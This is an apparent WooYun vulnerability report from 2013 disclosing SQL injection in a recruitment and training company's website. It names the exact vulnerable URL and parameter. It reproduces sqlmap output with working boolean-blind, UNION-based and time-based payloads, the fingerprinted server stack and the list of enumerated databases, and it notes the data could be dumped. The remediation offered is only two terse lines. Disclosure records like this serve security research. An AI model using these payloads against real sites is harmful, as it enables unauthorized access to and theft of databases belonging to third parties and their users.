英创安众对日某招聘培训机构sql注入 | wooyun-2013-039410

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2013-039410

漏洞标题：

英创安众对日某招聘培训机构sql注入

漏洞详情

披露状态：

2013-10-12：积极联系厂商并且等待厂商认领中，细节不对外公开
2013-11-26：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

对日某招聘培训机构sql注入,可脱裤

详细说明：

公司网站http://anchor.yingchuang.com/
注入地址 http://anchor.yingchuang.com/consult/seminar/detial.asp?id=227

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=227 AND 5320=5320
    Type: UNION query
    Title: Generic UNION query (NULL) - 19 columns
    Payload: id=-7089 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(110)+CHAR(116)+CHAR(100)+CHAR(113)+CHAR(87)+CHAR(76)+CHAR(101)+CHAR(105)+CHAR(104)+CHAR(74)+CHAR(117)+CHAR(109)+CHAR(113)+CHAR(66)+CHAR(113)+CHAR(100)+CHAR(98)+CHAR(99)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL-- 
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: id=-6742 OR 8302=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
---
web server operating system: Windows Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
available databases [6]:
[*] iBusiness
[*] master
[*] model
[*] msdb
[*] SNS_DB
[*] tempdb

随便查点数据,这个列名实在吐血

漏洞证明：

见详细说明

修复方案：

1.权限设置
2.这个列名谁看的懂?

版权声明：转载请注明来源 caspar@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

WooYun.org

漏洞概要 关注数(24) 关注此漏洞